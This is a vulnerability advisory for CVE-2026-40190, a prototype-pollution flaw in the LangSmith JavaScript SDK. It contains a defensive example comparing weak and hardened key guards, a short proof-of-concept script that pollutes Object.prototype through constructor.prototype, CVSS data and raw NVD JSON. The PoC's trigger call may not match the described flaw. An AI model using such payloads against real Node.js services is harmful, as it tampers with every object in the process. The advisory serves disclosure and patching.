Security Vulnerability Report
CVE-2026-40190 CVSS 5.6 MEDIUM

Published: 2026-04-10 20:16:24
Last Modified: 2026-04-29 20:59:49

Description

LangSmith Client SDKs provide SDKs for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.
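
The incomplete guard described above, next to a stricter one, as an added example (not code from the advisory, lodash or the LangSmith SDK). The names `setPath`, `setWeak`, `setHardened`, `compareGuards` and the marker property are hypothetical, and the walker is a simplified stand-in for a lodash-style set().

```javascript
// Added illustration: a simplified dotted-path setter, not the SDK's vendored lodash code.
const UNSAFE_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);

const isObjectLike = (v) =>
  v !== null && (typeof v === "object" || typeof v === "function");

// Walks `path` from `target`, creating containers as needed, and assigns `value`.
// `isBlocked` decides which path segments are refused.
function setPath(target, path, value, isBlocked) {
  const segments = path.split(".");
  if (segments.some(isBlocked)) return false; // refuse the whole write
  let node = target;
  for (const seg of segments.slice(0, -1)) {
    // Like a lodash-style set(), reuse whatever is already reachable under the
    // key, including inherited values such as `constructor`.
    if (!isObjectLike(node[seg])) node[seg] = {};
    node = node[seg];
  }
  node[segments[segments.length - 1]] = value;
  return true;
}

// Incomplete guard as described in the advisory: only "__proto__" is refused.
const setWeak = (t, p, v) => setPath(t, p, v, (s) => s === "__proto__");
// Stricter guard: every segment that can reach a prototype object is refused.
const setHardened = (t, p, v) => setPath(t, p, v, (s) => UNSAFE_SEGMENTS.has(s));

// Runs both setters against the same constructed path and reports whether an
// unrelated empty object picked up the marker. Cleans up after each run.
function compareGuards() {
  const marker = "gr_demo_marker"; // constructed property name
  const path = `constructor.prototype.${marker}`;
  const results = {};
  for (const [name, setter] of [["weak", setWeak], ["hardened", setHardened]]) {
    const accepted = setter({}, path, true);
    results[name] = { accepted, polluted: ({})[marker] === true };
    delete Object.prototype[marker]; // undo the pollution before the next run
  }
  return results;
}

console.log(compareGuards());
```

A key blocklist is one layer; descending only through own properties (`Object.prototype.hasOwnProperty.call(node, seg)`) closes the same path without depending on a list of names.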

CVSS Details

CVSS Score: 5.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

LangSmith JavaScript/TypeScript SDK < 0.5.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-40190
// This script demonstrates how to pollute Object.prototype using the vulnerable createAnonymizer API.
const { createAnonymizer } = require('langsmith');

// Malicious payload designed to bypass __proto__ check by using constructor.prototype
const maliciousPayload = {
  "constructor": {
    "prototype": {
      "isVulnerable": true
    }
  }
};

try {
  // Trigger the vulnerability by processing the malicious payload
  createAnonymizer(maliciousPayload);

  // Verify if the pollution was successful
  const emptyObject = {};
  if (emptyObject.isVulnerable === true) {
    console.log("[+] Exploit successful! Object.prototype has been polluted.");
  } else {
    console.log("[-] Exploit failed.");
  }
} catch (error) {
  console.error("Error executing PoC:", error);
}

References

https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40190", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:24.043", "lastModified": "2026-04-29T20:59:49.037", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252", "source": "[email protected]"}]}}